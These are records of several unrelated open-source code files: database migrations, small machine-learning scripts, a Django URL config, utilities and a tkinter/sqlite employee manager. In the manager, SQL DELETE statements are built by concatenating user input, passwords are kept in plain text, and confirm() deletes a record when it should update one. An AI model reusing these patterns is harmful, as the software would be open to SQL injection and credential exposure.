+{"seq_id":"20151884035","text":"\"\"\"added model for hall availability\n\nRevision ID: b7494178152b\nRevises: 313755ee9335\nCreate Date: 2023-04-10 13:46:49.920232\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"b7494178152b\"\ndown_revision = \"313755ee9335\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.create_table(\n        \"hall_availability\",\n        sa.Column(\"id\", sa.Integer(), nullable=False),\n        sa.Column(\"hall_id\", sa.Integer(), nullable=False),\n        sa.Column(\"start_time\", sa.DateTime(), nullable=False),\n        sa.Column(\"end_time\", sa.DateTime(), nullable=False),\n        sa.ForeignKeyConstraint(\n            [\"hall_id\"],\n            [\"hall.id\"],\n        ),\n        sa.PrimaryKeyConstraint(\"id\"),\n    )\n    with op.batch_alter_table(\"movie\", schema=None) as batch_op:\n        batch_op.add_column(sa.Column(\"start_time\", sa.DateTime(), nullable=False))\n        batch_op.add_column(sa.Column(\"end_time\", sa.DateTime(), nullable=False))\n        batch_op.drop_column(\"screen_time\")\n\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    with op.batch_alter_table(\"movie\", schema=None) as batch_op:\n        batch_op.add_column(\n            sa.Column(\n                \"screen_time\",\n                postgresql.TIMESTAMP(),\n                autoincrement=False,\n                nullable=False,\n            )\n        )\n        batch_op.drop_column(\"end_time\")\n        batch_op.drop_column(\"start_time\")\n\n    op.drop_table(\"hall_availability\")\n    # ### end Alembic commands ###\n","repo_name":"IvoGeorgievx/MovieProject","sub_path":"migrations/versions/b7494178152b_added_model_for_hall_availability.py","file_name":"b7494178152b_added_model_for_hall_availability.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71423368551","text":"# imports\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import tree, metrics\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# ----------- PART B -----------\r\n# q8\r\n# |T|\r\ntrain_data = pd.read_csv(\"train.csv\")\r\nsum_T = train_data[['Outcome']].eq(1).sum()\r\ntrain_data_filtered_T = train_data[train_data['Outcome'] == 1]\r\ntrain_data_filtered_F = train_data[train_data['Outcome'] == 0]\r\ntrain_data_filtered_F_T = train_data_filtered_F.head(sum_T[0])\r\ntrain_data_balanced = pd.concat([train_data_filtered_T, train_data_filtered_F_T]).sort_index()\r\n#print(train_data)\r\n\r\n# Read data from file 'train.csv' and check it on 'test.csv'\r\nX_train = train_data_balanced[train_data_balanced.columns.difference(['Outcome'])]\r\n#print(X_train)\r\nY_train = train_data_balanced[['Outcome']]\r\n#print(Y_train)\r\n\r\ntest_data = pd.read_csv(\"test.csv\")\r\nX_test = test_data[test_data.columns.difference(['Outcome'])]\r\nY_test = test_data[['Outcome']]\r\n\r\nBALANCED = tree.DecisionTreeClassifier(criterion=\"entropy\")\r\nBALANCED = BALANCED.fit(X_train, Y_train)\r\nBALANCED_test = BALANCED.predict(X_test)\r\nprint(\"BALANCED:\")\r\nprint(metrics.confusion_matrix(Y_test, BALANCED_test))\r\n#accuracy_score_BALANCED = accuracy_score(Y_test, BALANCED_test)\r\n#print(accuracy_score_BALANCED)\r\n\r\n\r\n\r\n","repo_name":"AmitTsvi/AI_HW3.1","sub_path":"BALANCED.py","file_name":"BALANCED.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26733560929","text":"\n\ndef square(a, b, c):\n    import math\n    D = b**2 - 4 * a * c  # discriminant\n    if D < 0:\n        x1 = x2 = None\n    elif D == 0:\n        x1 = x2 = -b / (2 * a)\n    else:\n        x1 = -(b + math.sqrt(D)) / (2 * a)\n        x2 = -(b - math.sqrt(D)) / (2 * a)\n    print(\"x1=\", x1, \"x2=\", x2)\n\n\na = float(input(\"a:\"))\nb = float(input(\"b:\"))\nc = float(input(\"c:\"))\nsquare(a, b, 
c)\ninput()\n","repo_name":"antongulyakov/.py","sub_path":"square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7916373305","text":"from tkinter import *\nfrom PIL import Image,ImageTk\nimport os\nimport sqlite3\nfrom tkinter import messagebox\n\nfrom tkinter import ttk\n\n\n\n\nroot=Tk()\nroot.geometry(\"1366x768+60+10\")\nroot.title(\"Contact\")\nroot.resizable(0, 0)\n# root.iconbitmap('./images/3.ico')\n\n\n\n# # # creating database\n# conn = sqlite3.connect(\"info.db\")\n# c = conn.cursor()\n# '''\n# c.execute(\"\"\"CREATE TABLE information(\n#     First_Name text,\n#     Age integer,\n#     Address text,\n#     Gender integer,\n#     Email text,\n#     Password text\n# )\"\"\")\n# '''\n\n# function\n# ------------------------------------------\ndef save():\n    # write the edited values back to the selected record\n    global root1\n\n    conn = sqlite3.connect('info.db')\n    c = conn.cursor()\n    record_id=employeeID.get()\n    c.execute(\"\"\"UPDATE information SET\n        Full_name = :full_name,\n        Age = :age,\n        Address = :address,\n        Gender = :gender,\n        Email = :email,\n        Password = :password\n        WHERE oid = :oid\"\"\",\n              {\n                  'full_name': fullname.get(),\n                  'age': age.get(),\n                  'address': address.get(),\n                  'gender': gender.get(),\n                  'email': email.get(),\n                  'password': password.get(),\n                  'oid': record_id\n              })\n    conn.commit()\n    conn.close()\n    employeeID.delete(0,END)\n    root1.destroy()\n    os.system(\"admin.py\")\n\n\n\ndef clear():\n    first_name.delete(0,END)\n    last_name.delete(0,END)\n    gender.delete(0,END)\n    age.delete(0,END)\n    address.delete(0,END)\n    contact.delete(0, END)\n\ndef update():\n    root.withdraw()\n    if (employeeID.get()==\"\"):\n        messagebox.showinfo(\"Error\",\"Please select employee\")\n    else:\n        global my_img\n        global root1\n        root1 = Toplevel()\n        root1.geometry(\"1366x768+60+10\")\n        root1.title(\"Login\")\n        root1.resizable(0, 0)\n\n        conn = sqlite3.connect('info.db')\n        c = conn.cursor()\n        record_id = employeeID.get()\n        c.execute(\"SELECT * FROM information WHERE oid = ?\", (record_id,))\n        records = c.fetchall()\n        global fullname\n        global address\n        global age\n        global gender\n        global email\n        global password\n\n        my_img = ImageTk.PhotoImage(Image.open('signup.png'))\n        my_label=Label(root1,image=my_img).pack()\n        fullname_lbl = Label(root1, text=\"Full Name\", font=('Consolas', 15), bg=\"white\")\n        fullname_lbl.place(x=180, y=200)\n        age_lbl = Label(root1, text=\"Age\", font=('Consolas', 15), bg=\"white\")\n        age_lbl.place(x=720, y=200)\n        address_lbl = Label(root1, text=\"Address\", font=('Consolas', 15), bg=\"white\")\n        address_lbl.place(x=180, y=290)\n        gender_lbl = Label(root1, text=\"Gender\", font=('Consolas', 15), bg=\"white\")\n        gender_lbl.place(x=720, y=290)\n        email_lbl = Label(root1, text=\"Email\", font=('Consolas', 15), bg=\"white\")\n        email_lbl.place(x=180, y=380)\n        password_lbl = Label(root1, text=\"Password\", font=('Consolas', 15), bg=\"white\")\n        password_lbl.place(x=720, y=380)\n\n        fullname = Entry(root1, width=40, border=0, font=('Consolas', 15))\n        fullname.place(x=180, y=230)\n        age = Entry(root1, width=40, border=0, font=('Consolas', 15))\n        age.place(x=720, y=230)\n        gender = Entry(root1, width=40, border=0, font=('Consolas', 15))\n        gender.place(x=720, y=320)\n        address = Entry(root1, width=40, border=0, font=('Consolas', 15))\n        address.place(x=180, y=320)\n\n        email = Entry(root1, width=40, border=0, font=('Consolas', 15))\n        email.place(x=180, y=410)\n        password = Entry(root1, width=40, border=0, font=('Consolas', 15))\n        password.place(x=720, y=410)\n\n\n\n        check = IntVar()\n        
checkbtn = Checkbutton(root1, text=\"Terms and Conditions\", font=('Consolas', 20), bg=\"white\",\n activebackground=\"white\", variable=check, onvalue=1, offvalue=0)\n checkbtn.deselect()\n checkbtn.place(x=525, y=540)\n\n for record in records:\n fullname.insert(0, record[0])\n age.insert(0, record[1])\n address.insert(0, record[2])\n gender.insert(0, record[3])\n email.insert(0, record[4])\n password.insert(0, record[5])\n submit_btn = Button(root1, text=\"SUBMIT\", font=('Consolas', 15), cursor='hand2',\n bg=\"#834dd6\", border=0, activebackground=\"#834dd6\", padx=22, pady=10,\n command=confirm)\n submit_btn.place(x=544, y=630)\n exit_btn = Button(root1, text=\"EXIT\", font=('Consolas', 15), cursor='hand2',\n bg=\"#834dd6\", border=0, activebackground=\"#834dd6\", padx=25, pady=10, )\n exit_btn.place(x=715, y=630)\n\ndef delete():\n if (employeeID.get()==\"\"):\n messagebox.showinfo(\"Error\",\"Please select employee\")\n else:\n root.withdraw()\n conn = sqlite3.connect('info.db')\n c = conn.cursor()\n c.execute('DELETE from information WHERE oid= ' + employeeID.get())\n print(\"Deleted successfully\")\n\n conn.commit()\n conn.close()\n employeeID.delete(0, END)\n\n os.system(\"management.py\")\n\ndef confirm():\n global root1\n\n conn = sqlite3.connect('info.db')\n c = conn.cursor()\n c.execute('DELETE from information WHERE oid= ' + employeeID.get())\n print(\"Deleted successfully\")\n\n conn.commit()\n conn.close()\n employeeID.delete(0, END)\n root1.destroy()\n os.system(\"management.py\")\n\n\n\n\ndef search():\n record_id = employeeID.get()\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n conn = sqlite3.connect(\"info.db\")\n c = conn.cursor()\n\n c.execute(\"SELECT rowid, * FROM information WHERE FullName = ?\", (record_id,))\n records = c.fetchall()\n\n for record in records:\n my_tree.insert('', 'end', values=(record))\n\n conn.commit()\n conn.close()\n\n\n\n\n\n\n\n\ndef refresh():\n root.destroy()\n os.system('management.py')\n\n\n\n\n\ndef Exit():\n sure = messagebox.askyesno(\"Exit\", \"Are you sure you want to exit?\", parent=root)\n if sure == True:\n root.destroy()\n\n\n\n\n# desgin\n# -------------------------------------\n\n# image\nmyimage=ImageTk.PhotoImage(Image.open('management.png'))\nLabel(image=myimage).pack()\n\n\n\n\n# entry\nemployeeID=Entry(root,width=55,border=0,font=('Consolas',18))\nemployeeID.place(x=180,y=595)\n# entryID = employeeID.get()\n\n\n\n# buttons\n\nsearchBTN=Button(root,text=\"Search\",font=('Consolas',15),cursor='hand2',padx=35,pady=7,\n bg=\"#cc469d\",border=0,activebackground=\"#cc469d\",command = search)\nsearchBTN.place(x=1025,y=585)\n\nupdateBTN=Button(root,text=\"UPDATE \",font=('Consolas',22),cursor='hand2',padx=20,pady=1,\n bg=\"#6b30a6\",border=0,activebackground=\"#6b30a6\",command=update)\nupdateBTN.place(x=220,y=650)\n\ndeleteBTN=Button(root,text=\"DELETE \",font=('Consolas',22),cursor='hand2',\n bg=\"#9d3ca2\",border=0,activebackground=\"#9d3ca2\",padx=20,pady=1, command = delete)\ndeleteBTN.place(x=600,y=650)\nrefreshBTN=Button(root,text=\"REFRESH \",font=('Consolas',22),cursor='hand2',\n bg=\"#cc469d\",border=0,activebackground=\"#cc469d\",padx=20,pady=1, command = refresh)\nrefreshBTN.place(x=980,y=650)\n\n\nlogoutBTN=Button(root,text=\"EXIT\",font=('Consolas',18),cursor='hand2',padx=20,pady=1,\n bg=\"#cc469d\",border=0,activebackground=\"#cc469d\", command = exit)\nlogoutBTN.place(x=1122,y=38)\n\n\n\n\n\n\n# tree\nconn=sqlite3.connect('info.db')\nc=conn.cursor()\nc.execute('SELECT * ,oid from 
information')\nrecords = c.fetchall()\nmy_tree = ttk.Treeview(root)\nmy_tree['columns'] = (\"Sno.\",\"First Name\", \"Last Name\", \"Gender\",\"Age\", \"Address\",\"Contact\")\n\nmy_tree.column(\"#0\", width =0, stretch=NO)\nmy_tree.column(\"Sno.\", anchor=CENTER,width=30)\nmy_tree.column(\"First Name\", anchor=CENTER,width=150)\nmy_tree.column(\"Last Name\", anchor=CENTER,width=120)\nmy_tree.column(\"Gender\", anchor=CENTER,width=40)\nmy_tree.column(\"Age\", anchor=CENTER,width=90)\nmy_tree.column(\"Address\", anchor=CENTER,width=100)\nmy_tree.column(\"Contact\", anchor=CENTER,width=100)\n\nmy_tree.heading(\"#0\", text = \"\", anchor = CENTER)\nmy_tree.heading(\"Sno.\", text = \"Sno\", anchor = CENTER)\nmy_tree.heading(\"First Name\", text = \"First Name\", anchor = CENTER)\nmy_tree.heading(\"Last Name\", text = \"Last Name\", anchor = CENTER)\nmy_tree.heading(\"Gender\", text = \"Gender\", anchor = CENTER)\nmy_tree.heading(\"Age\", text = \"Age\", anchor = CENTER)\nmy_tree.heading(\"Address\", text = \"Address\", anchor = CENTER)\nmy_tree.heading(\"Contact\",text = \"Contact\", anchor = CENTER)\n\nmy_tree.place(x=110,y=90, width=1150, height=420)\n\n\n\n\ncount=0\nfor record in records:\n my_tree.insert(parent='',index='end',iid=count,text=\"Parent\",values=(record[6],record[0],record[1],record[2],record[3],record[4],record[5]))\n count+=1\nconn.commit()\nconn.close()\nroot.mainloop()","repo_name":"uniqstha/loginsystem","sub_path":"management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":8806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12376226436","text":"\"\"\"hontone URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom hontone import views\n\n# we will probably need to reevaluate our urls, which will be the home page and how we want to layout\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('login', views.login, name='login'),\n path('logout', views.logout, name='logout'),\n path('users', views.show_users, name='user'), # NOTE: temporary, will only be used to see the users we make\n path('word-decks', views.show_word_decks, name='show_word_decks'),\n path('word-decks/delete-all', views.clear_word_decks, name='clear_word_decks'),\n path('word-decks//delete', views.remove_word_deck, name='remove_word_deck'),\n path('word-decks/', views.show_word_deck, name='show_word_deck'),\n path('word-decks//delete-all', views.clear_word_deck_words, name='clear_word_deck_words'),\n path('word-decks///delete', views.remove_word_deck_word, name='remove_word_deck_word'),\n path('user-words', views.show_words, name='show_words'),\n path('user-words/delete-all', views.clear_words, name='clear_words'),\n path('user-words//delete', views.remove_word, name='remove_word'),\n path('', include('books.urls'))\n]\n","repo_name":"nmport/hontonE","sub_path":"hontone/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72565747749","text":"#!/usr/bin/env python\n# coding:utf-8\n'''创建Sqlite数据库'''\nimport time\nimport os\nimport os.path as osp\nimport sqlite3\nimport random\nimport re\n\ndef mkdir(dir_name):\n if not osp.exists(dir_name):\n os.makedirs(dir_name, exist_ok=True)\n return\n\n\ndef create_database_table(database_path, database, table_name):\n mkdir(database_path)\n database_connect = sqlite3.connect(osp.join(database_path, database))\n print(\"open database:%s successfully\" % database)\n database_cur = database_connect.cursor()\n try:\n database_cur.execute(\n \"create table %s(num INTEGER PRIMARY KEY, target TEXT, name TEXT, timer TEXT);\" % table_name)\n except:\n print(\"table:%s has existed\" % table_name)\n return database_cur, database_connect\n\n\ndef insert_database_table(database_cur, database_connect, table_name, values):\n database_cur.execute(\"INSERT INTO %s VALUES(?,?,?,?);\" % \\\n table_name, (None, values[0], values[1], values[2]))\n database_connect.commit()\n\n\nif __name__ == \"__main__\":\n database_path = './database'\n database = 'demo.sqlite3'\n table_name = 'time_count'\n\n database_cur, database_connect = create_database_table(database_path, database, table_name)\n count = 0\n fruit = ['apple', 'banana', 'bayberry', 'cherry']\n while True:\n target = fruit[random.randint(0, 3)]\n id_name = str(count).zfill(10)[:10]\n now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n\n values = (target, id_name, now_time)\n insert_database_table(database_cur, database_connect, table_name, values)\n\n count += 1\n # time.sleep(0.5)","repo_name":"LonelyWise/VivaLNKTool","sub_path":"Vivalnk/Test_tool/TestDB.py","file_name":"TestDB.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"46892714048","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom multibandit import BernoulliBandit, Solver, plot_results\n\n# 采用上置信界算法\nclass UCB(Solver):\n '''\n 上置信界算法\n\n 参数:\n bandit:多臂老虎机实例\n coef:不确定性度量在目标函数中的参数\n 
init_prob:每个杆的期望奖励概率初始化\n '''\n # 初始化\n def __init__(self, bandit, coef, init_prob=1.0):\n super(UCB, self).__init__(bandit)\n self.total_count = 0 # 记录当前时间步\n self.estimates = np.array([init_prob] * self.bandit.K) # 对每个杆的期望奖励估计\n self.coef = coef # 不确定性度量的参数\n\n # 选择该步的动作\n # 使用期望奖励上界最大的杆\n def run_one_step(self):\n self.total_count += 1\n exceed_prob = 1/self.total_count # 超过期望奖励上界的概率(与时间步成反比)\n ucb = self.estimates + self.coef * np.sqrt(\n - np.log(exceed_prob) / (2 * (self.counts + 1))\n )\n # 选取期望奖励上界最大的杆子\n k = np.argmax(ucb)\n r = self.bandit.step(k)\n self.estimates[k] += 1 / (self.counts[k]+1) * (r - self.estimates[k]) # 期望奖励更新公式\n\n return k\n\nif __name__ == \"__main__\":\n # 初始化10-臂老虎机\n np.random.seed(1) # 设定随机数种子\n K = 10 # 10臂老虎机\n bandit_10_arm = BernoulliBandit(K)\n\n np.random.seed(1)\n coef = 1 # 控制不确定性比重的系数\n UCB_solver = UCB(bandit_10_arm, coef)\n UCB_solver.run(5000)\n print('上置信界算法的累积懊悔为:', UCB_solver.regret)\n plot_results([UCB_solver], [\"UCB\"])\n","repo_name":"Neuerliu/deep_reinforcement_learning_notes","sub_path":"代码/第二节_多臂老虎机/ucb.py","file_name":"ucb.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"73189979428","text":"\"\"\"\nThis script will zip the logfile and the database in two different zip files..\n\"\"\"\nimport logging\nimport os\nimport zipfile\nfrom lib import my_env\n\n\ncfg = my_env.init_env(\"vdab\", __file__)\nlogging.info(\"Start Application\")\n\n# Set directories\n# parsed_dir = cfg[\"LogFiles\"][\"parsed_dir\"]\nmerged_fn = cfg[\"LogFiles\"][\"merged_fn\"]\ndb = cfg[\"Main\"][\"db\"]\n\n# Zip merged file first\nlogging.info(\"Start zip {fn}\".format(fn=merged_fn))\n(fp, fn) = os.path.split(merged_fn)\nzipfn = os.path.join(fp, \"{fn}.zip\".format(fn=fn.split(\".\")[0]))\nzipf = zipfile.ZipFile(zipfn, 'w', zipfile.ZIP_DEFLATED)\nzipf.write(merged_fn)\nzipf.close()\n\nlogging.info(\"Start zip {fn}\".format(fn=db))\n(fp, fn) = os.path.split(db)\nzipfn = os.path.join(fp, \"{fn}.zip\".format(fn=fn.split(\".\")[0]))\nzipf = zipfile.ZipFile(zipfn, 'w', zipfile.ZIP_DEFLATED)\nzipf.write(db)\nzipf.close()\nlogging.info(\"End Application\")\n","repo_name":"dirkhpe/vdcs","sub_path":"isamparsing/30_zip_logs.py","file_name":"30_zip_logs.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27394063351","text":"import pandas as pd\nimport pickle\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n\ndef train_mensaje_model():\n # Cargar el conjunto de datos\n data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/sms.tsv\", sep='\\t', header=None, names=['clasificacion', 'categoria', 'mensaje'])\n\n # Convertir las columnas 'clasificacion' y 'categoria' a tipo cadena\n data['clasificacion'] = data['clasificacion'].astype(str)\n data['categoria'] = data['categoria'].astype(str)\n\n # Preprocesar los datos\n vectorizer = CountVectorizer()\n X = vectorizer.fit_transform(data['mensaje'])\n y = data['clasificacion']\n\n # Dividir los datos en conjuntos de entrenamiento y prueba\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n # Entrenar un modelo de Naive Bayes\n clf = MultinomialNB()\n clf.fit(X_train, y_train)\n\n # 
Calcular la precisión en el conjunto de prueba\n y_pred = clf.predict(X_test)\n classification_accuracy = accuracy_score(y_test, y_pred)\n\n # Guardar el modelo entrenado\n with open('mensaje_model.pkl', 'wb') as file:\n pickle.dump((vectorizer, clf), file)\n\n return classification_accuracy\n\ndef train_llamada_model():\n # Cargar el conjunto de datos desde el archivo CSV\n data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/Phone%20Number.tsv\", delimiter=\"\\t\", header=None, names=['clasificacion', 'categoria', 'numero'])\n\n # Convertir la columna 'numero' a tipo cadena\n data['numero'] = data['numero'].astype(str)\n\n # Dividir los datos en conjuntos de entrenamiento y prueba\n X_train, X_test, y_train, y_test = train_test_split(data['numero'], data['clasificacion'], test_size=0.2, random_state=42)\n\n # Preprocesar los datos\n vectorizer = CountVectorizer()\n X_train = vectorizer.fit_transform(X_train)\n X_test = vectorizer.transform(X_test)\n\n # Entrenar un modelo de Naive Bayes\n clf = MultinomialNB()\n clf.fit(X_train, y_train)\n\n # Calcular la precisión del modelo\n y_pred = clf.predict(X_test)\n classification_accuracy = accuracy_score(y_test, y_pred)\n\n # Guardar el modelo entrenado\n with open('llamada_model.pkl', 'wb') as file:\n pickle.dump((vectorizer, clf), file)\n\n return classification_accuracy\n\nimport pandas as pd\n\ndef load_test_data():\n # Cargar los datos de prueba para mensajes\n mensaje_data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/sms.tsv\", sep='\\t', header=None, names=['clasificacion', 'categoria', 'mensaje'])\n X_mensaje_test = mensaje_data['mensaje']\n y_mensaje_true = mensaje_data['clasificacion']\n\n\n # Cargar los datos de prueba para llamadas\n llamada_data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/Phone%20Number.tsv\", delimiter=\"\\t\", header=None, names=['clasificacion', 'categoria', 'numero'])\n X_llamada_test = llamada_data['numero']\n y_llamada_true = llamada_data['clasificacion']\n \n\n return X_mensaje_test, y_mensaje_true, X_llamada_test, y_llamada_true, \n\ndef load_categorias_data():\n # Cargar los datos de categorías para mensajes\n mensaje_data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/sms.tsv\", sep='\\t', header=None)\n categorias_mensaje = mensaje_data[1].unique() # La columna de categoría es la segunda columna (índice 1)\n\n # Cargar los datos de categorías para llamadas\n llamada_data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/Phone%20Number.tsv\", delimiter=\"\\t\", header=None)\n categorias_llamada = llamada_data[1].unique() # La columna de categoría es la segunda columna (índice 1)\n\n return categorias_mensaje, categorias_llamada","repo_name":"Capacoila/AplicacionAntiSpam","sub_path":"block/training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16949030163","text":"import multiprocessing\nimport time\n\nstart = time.perf_counter()\n\ndef sleep():\n print('Sleeping 1 second...')\n time.sleep(1)\n print('Waking up dude...')\n\n# Here, we've called two multiprocessing processes\nprocess1 = multiprocessing.Process(target=sleep)\nprocess2 = multiprocessing.Process(target=sleep)\n\n# We need to start them\nprocess1.start()\nprocess2.start()\n\n#With join() method, you set 
the point where the main process waits for the workers to finish; if it's not called, the main process can reach the end of the script before the workers do\nprocess1.join()\nprocess2.join()\n\nfinish = time.perf_counter()\n\nprint(f'Finished in {round(finish-start, 2)} second(s)')","repo_name":"alissonzampietro/beginning-python","sub_path":"parallel_processing/mtprocessing.py","file_name":"mtprocessing.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"39539061140","text":"import xlrd\nimport validators\nfrom newspaper import Article\nfrom os import path\nfrom object_extract.config import *\n\n\ndef extract(data_root):\n    \"\"\"\n    Collect one list of parsed articles per tag file found under data_root.\n\n    :param data_root: base directory holding the per-tag spreadsheets\n    :return: list of per-tag article lists\n    \"\"\"\n    articles = list()\n    for tag in FILES:\n        file = data_root + tag\n        if path.exists(file):\n            articles.append(extract_articles(data_root + tag, tag))\n    return articles\n\n\ndef extract_articles(excel_file, tag, nlp=False):\n    \"\"\"\n    Extract links from excel file that is in correct format.\n    Correct format: links appear in the second column.\n    :param excel_file:\n    :param tag:\n    :param nlp:\n    :return:\n    \"\"\"\n    spread_sheet = xlrd.open_workbook(excel_file)\n    results = list()\n    for sheet in spread_sheet.sheets():\n        col = sheet.col(ARTICLE)\n        counter = 0\n        for cell in col:\n            if counter == 10:\n                break\n            link = cell.value\n            if validators.url(link):\n                article = Article(link)\n                try:\n                    article.download()\n                    article.parse()\n                except Exception:\n                    continue\n                if nlp:\n                    article.nlp()\n                article.tag = tag\n                results.append(article)\n                counter += 1\n    return results\n","repo_name":"kqke/NYT-classifier","sub_path":"object_extract/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"38810501536","text":"# correlation\n\ndef myMean(values):\n    # arithmetic mean; correl() below relies on this helper\n    return sum(values) / len(values)\n\ndef correl(x, y):\n\n    xdev = [(i - myMean(x)) for i in x]\n    ydev = [(i - myMean(y)) for i in y]\n\n    sdev = []\n\n    for i in range(len(xdev)):\n        sdev.append(xdev[i]*ydev[i])\n\n    numer = sum(sdev)\n\n    dnom1 = [(i-myMean(x))**2 for i in x]\n    dnom2 = [(i-myMean(y))**2 for i in y]\n\n    dnom1 = sum(dnom1)**0.5\n    dnom2 = sum(dnom2)**0.5\n\n    denom = dnom1 * dnom2\n\n    stat = numer/denom\n\n    return stat\n    \n# def cortest(): \n","repo_name":"Kamakshaiah/python-lab","sub_path":"fundamentals/scripts/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19454743728","text":"from scNodes.core.opengl_classes import *\n\n\nclass ROI:\n    MIN_SIZE = 5\n\n    def __init__(self, box=[0, 0, 1, 1], colour=(1.0, 1.0, 1.0, 1.0)):\n        \"\"\"\n\n        :param box: list/tuple with (x_min, y_min, x_max, y_max) coordinates.\n        :param colour: colour of the ROI\n        \"\"\"\n        self.box = list(box)\n        self.colour = colour\n        self.va = VertexArray(None, None, attribute_format=\"xy\")\n        self.use = False\n        self.update_va()\n\n    def update_va(self):\n        left = self.box[0]\n        top = self.box[1]\n        right = self.box[2]\n        bottom = self.box[3]\n        coordinates = [left, bottom,\n                       right, bottom,\n                       right, top,\n                       left, top]\n        indices = [0, 1, 1, 2, 2, 3, 3, 0]\n        self.va.update(VertexBuffer(coordinates), IndexBuffer(indices))\n\n    def render(self, shader, camera):\n        self.va.bind()\n        shader.bind()\n        shader.uniformmat4(\"cameraMatrix\", camera.view_projection_matrix)\n        shader.uniform3f(\"lineColour\", self.colour)\n        shader.uniform3f(\"translation\", [0.0, 0.0, 0.0])\n        glDrawElements(GL_LINES, 
self.va.indexBuffer.getCount(), GL_UNSIGNED_SHORT, None)\n shader.unbind()\n self.va.unbind()\n\n def is_in_roi(self, point):\n return self.box[0] < point[0] < self.box[2] and self.box[1] < point[1] < self.box[3]\n\n def translate(self, shift):\n self.box[0] += int(shift[0])\n self.box[1] += int(shift[1])\n self.box[2] += int(shift[0])\n self.box[3] += int(shift[1])\n self.update_va()\n\n def set_box(self, box):\n self.box = box\n self.visible = True\n if self.box[0] == self.box[2] and self.box[1] == self.box[3]:\n self.visible = False\n self.update_va()\n\n def correct_order(self):\n change = False\n if self.box[2] < self.box[0]:\n self.box[0], self.box[2] = self.box[2], self.box[0]\n change = True\n if self.box[3] < self.box[1]:\n self.box[1], self.box[3] = self.box[3], self.box[1]\n change = True\n if change:\n self.update_va()\n\n def limit(self, width, height):\n if np.abs(self.box[2] - self.box[0]) < ROI.MIN_SIZE:\n self.box[2] += ROI.MIN_SIZE // 2\n self.box[0] -= ROI.MIN_SIZE // 2\n if np.abs(self.box[3] - self.box[1]) < ROI.MIN_SIZE:\n self.box[3] += ROI.MIN_SIZE // 2\n self.box[1] -= ROI.MIN_SIZE // 2\n self.box[0] = min([width, max([0, self.box[0]])])\n self.box[1] = min([height, max([0, self.box[1]])])\n self.box[2] = min([width, max([0, self.box[2]])])\n self.box[3] = min([height, max([0, self.box[3]])])\n self.update_va()\n\n\n\nclass Marker:\n def __init__(self, vertices = None, indices = None, colour = (1.0, 0.0, 1.0, 1.0)):\n self.colour = colour\n self.vertices = vertices\n self.indices = indices\n self.va = VertexArray(attribute_format=\"xy\")\n\n if self.vertices is not None and self.indices is not None:\n self.va.update(VertexBuffer(self.vertices), IndexBuffer(self.indices))\n\n def set_vertices(self, vertices, indices):\n self.vertices = 